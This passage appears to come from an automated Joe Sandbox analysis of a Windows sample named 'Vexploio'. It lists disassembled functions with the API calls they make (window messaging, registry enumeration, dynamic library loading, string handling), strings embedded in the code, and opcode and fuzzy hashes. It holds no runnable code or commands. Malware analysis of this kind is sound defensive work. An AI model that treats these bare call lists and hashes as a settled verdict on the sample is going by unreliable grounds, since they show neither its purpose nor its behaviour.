                              • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                              • String ID:
                              • API String ID: 2313361498-0
                              • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                              • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                              APIs
                              • GetClientRect.USER32(?,?), ref: 00405F65
                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                              • GetWindow.USER32(00000000), ref: 00405F80
                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Window$ItemMessageRectSend$Client
                              • String ID:
                              • API String ID: 2047574939-0
                              • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                              • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                              • String ID:
                              • API String ID: 4218492932-0
                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                              APIs
                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                              • memcpy.MSVCRT ref: 0044A8BF
                              • memcpy.MSVCRT ref: 0044A90C
                              • memcpy.MSVCRT ref: 0044A988
                                • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                              • memcpy.MSVCRT ref: 0044A9D8
                              • memcpy.MSVCRT ref: 0044AA19
                              • memcpy.MSVCRT ref: 0044AA4A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy$memset
                              • String ID: gj
                              • API String ID: 438689982-4203073231
                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                              • API String ID: 3510742995-2446657581
                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                              APIs
                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                              • memset.MSVCRT ref: 00405ABB
                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                              • SetFocus.USER32(?), ref: 00405B76
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: MessageSend$FocusItemmemset
                              • String ID:
                              • API String ID: 4281309102-0
                              • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                              • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _snwprintfwcscat
                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                              • API String ID: 384018552-4153097237
                              • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                              • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ItemMenu$CountInfomemsetwcschr
                              • String ID: 0$6
                              • API String ID: 2029023288-3849865405
                              • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                              • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                              APIs
                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                              • memset.MSVCRT ref: 00405455
                              • memset.MSVCRT ref: 0040546C
                              • memset.MSVCRT ref: 00405483
                              • memcpy.MSVCRT ref: 00405498
                              • memcpy.MSVCRT ref: 004054AD
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$memcpy$ErrorLast
                              • String ID: 6$\
                              • API String ID: 404372293-1284684873
                              • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                              • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                              APIs
                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                              • wcscpy.MSVCRT ref: 0040A0D9
                              • wcscat.MSVCRT ref: 0040A0E6
                              • wcscat.MSVCRT ref: 0040A0F5
                              • wcscpy.MSVCRT ref: 0040A107
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                              • String ID:
                              • API String ID: 1331804452-0
                              • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                              • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                              APIs
                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                              • String ID: advapi32.dll
                              • API String ID: 2012295524-4050573280
                              • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                              • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                              APIs
                              Strings
                              • <?xml version="1.0" ?>, xrefs: 0041007C
                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                              • <%s>, xrefs: 004100A6
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$_snwprintf
                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                              • API String ID: 3473751417-2880344631
                              • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                              • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: wcscat$_snwprintfmemset
                              • String ID: %2.2X
                              • API String ID: 2521778956-791839006
                              • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                              • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _snwprintfwcscpy
                              • String ID: dialog_%d$general$menu_%d$strings
                              • API String ID: 999028693-502967061
                              • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                              • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy$memsetstrlen
                              • String ID:
                              • API String ID: 2350177629-0
                              • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                              • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset
                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                              • API String ID: 2221118986-1606337402
                              • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                              • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                              • String ID:
                              • API String ID: 265355444-0
                              • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                              • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                              APIs
                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                              • memset.MSVCRT ref: 0040C439
                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                              • _wcsupr.MSVCRT ref: 0040C481
                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                              • memset.MSVCRT ref: 0040C4D0
                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                              • String ID:
                              • API String ID: 1973883786-0
                              • Opcode ID: b4109fb38cace7b03c62c87583d72b8469db04adbac5cd884980a40196e27448
                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                              • Opcode Fuzzy Hash: b4109fb38cace7b03c62c87583d72b8469db04adbac5cd884980a40196e27448
                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                              APIs
                              • memset.MSVCRT ref: 004116FF
                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                              • API String ID: 2618321458-3614832568
                              • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                              • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                              APIs
                              • memset.MSVCRT ref: 004185FC
                              • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                              • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@AttributesFilememset
                              • String ID:
                              • API String ID: 776155459-0
                              • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                              • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                              APIs
                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                              • malloc.MSVCRT ref: 00417524
                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                              • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                              • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                              • String ID:
                              • API String ID: 2308052813-0
                              • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
